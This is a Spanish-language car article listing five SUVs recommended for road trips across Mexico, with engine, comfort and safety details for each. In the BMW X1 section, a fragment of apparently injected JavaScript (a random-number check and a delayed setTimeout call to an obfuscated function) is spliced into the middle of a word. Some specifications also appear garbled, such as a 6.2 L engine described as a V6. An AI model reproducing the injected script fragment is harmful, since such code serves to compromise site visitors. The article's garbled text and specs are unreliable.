Las mejores SUVs para recorrer México

    Las mejores SUVs para recorrer México

    La carretera, el paisaje, tú y tus amigos o alguien especial. No sé, piénsalo. 

    Autor: Elizabeth Rivera 24 septiembre, 2019



    Shutterstock

     

     

    ¿Qué camioneta comprar para viajar por el interior del país?

     

    ¡Deja de imaginarlo y hazlo! México es uno de los países con más belleza natural y miles de kilómetros para recorrer. Del mar a la sierra, lo único que debe limitarte de hacer un viaje es tu desidia. ¡Y ni siquiera eso! Deja de un lado la apatía y decídete de una buena vez a hacer ese viaje que siempre has querido. 

     

     

    Para darte un poco más de inspiración a hacerlo, nos pusimos a pensar en cuáles son las mejores SUVs para un recorrido largo, y llegamos a la conclusión de que las 5 que te presentaremos a continuación, cumplen con nuestras expectativas de confort y seguridad.  

     

     

    BMW X1 

    Existen varias versiones de esta SUV, pero la versión S Drive 18iA es la que mejor se acopla a las necesidades de un viaje. Cuenta con un motor turbo de 3 cilindros con capacidad de 1.5 L. y alcanza los 136 HP de potencia. 

     

    Tiene una transmisión automática de 6 velocidades ofreciendo un consumo de 16.1 km/l.

     

    Los detalles del interior hacen de esta camioneta perfecta pues da una sensación de tranquilidad y confort, además de lujo. Ofrece aire acondicionado en dos zonas y el tablero cuenta con conexión USB y Bluetooth, además de la pantalla a color de 6.5 pulgadas.

     

    Hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de seguridad, tiene bolsas de aire frontales, laterales y de cabeza, frenos ABS, y Control Dinámico de Estabilidad y Tracción.

     

     

    Cadillac Escalade

     

    En cuanto a calidad, Cadillac de pinta solo. Esta SUV tiene tres versiones y todas combinan comodidad, lujo y potencia.

     

    Tiene un motor V6 de 420 HP de potencia, cilindros de 6.2 L y la transmisión es de 8 velocidades.

     

    Todas las versiones cuentan con un sistema de navegación GPS, cámara de visión de 360° y pantalla de 9 pulgadas con reproductor de Blu-Ray. Las versiones más equipadas cuentan también con pantallas de 7 pulgadas en los asientos traseros. 

     

    La carrocería está hecha con acero reforzado para mayor seguridad, bolsas de aire frontales y laterales, y el sistema vibratorio de alerta de objetos cercanos al vehículo.

     

     

     

    Volkswagen Touareg 

     

    La versión V7 TDI es la que escogimos. Tiene un motor de 6 cilindros de 3.0 L que trabaja con diésel con una transmisión tiptronic de 8 velocidades y una potencia de 243 HP.

     

    Cuenta con frenos ABS en las cuatro ruedas, 6 bolsas de aire (dos frontales para conductor y pasajero, dos más delanteras tipo cortina y dos más traseras tipo cortina), asistente en arranque en pendientes, control de tracción y estabilidad, y detector de cansancio. 

     

    Además, la carrocería está reforzada con barras de acero en el marco de las puertas laterales.

     

    La Touareg tiene una pantalla táctil de 8 pulgadas, con 8 bocinas repartidas en todo el habitáculo, aire acondicionado, vestiduras de piel y cámara de visión aérea con sensores de estacionamiento tanto delanteros como traseros y techo panorámico.

     

     

     

    GMC Acadia

     

    Esta es una de las SUVs más seguras en su tipo en el mercado. Cuenta con frenos ABS en la cuatro llantas, control de estabilidad ESP con alerta de cambio de carril e integra un sistema de detección de peatones con frenado automático.

     

    Tiene 8 bolsas de aire repartidas en dos frontales y laterales, dos más tipo cortina, una de rodillas para conductor y una más central para evitar el choque entre los pasajeros.

     

    Las dos versiones disponibles cuentan con transmisión automática de seis velocidades, motor de V6 de 3.6L y 310 HP con lo que alcanza los 8.70 km/l de consumo de combustible en ciudad y en  carretera los 13.20 km/l.

     

     

     

     

    Ford Escape 

     

    Tiene seis versiones que pueden ajustarse a varios bolsillos y con distintos tipos de equipamiento. Todas cuentan con lo mejor en seguridad y suficiente potencia para recorrer las carreteras. 

     

    La versión Trend Advance cuenta con un motor de 2.5L con 168 HP de potencia y las versiones más altas uno Turbo EcoBoost de 2.0 L con lo cual alcanza los 245 HP.

     

    En cuanto a seguridad todas cuentan con bolsas de aire frontales, laterales y tipo cortina, dirección electrónica asistida, control de estabilidad y de tracción, y sistema de frenos ABS con asistencia de frenado EBD.

     

     

     

     

    Para vestir de acuerdo con tu nueva camioneta, te dejamos este artículo sobre OUTFITS DE ALTA GAMA.

     

    Temas relacionados con esta nota: , , , , , ,

La carretera, el paisaje, tú y tus amigos o alguien especial. No sé, piénsalo.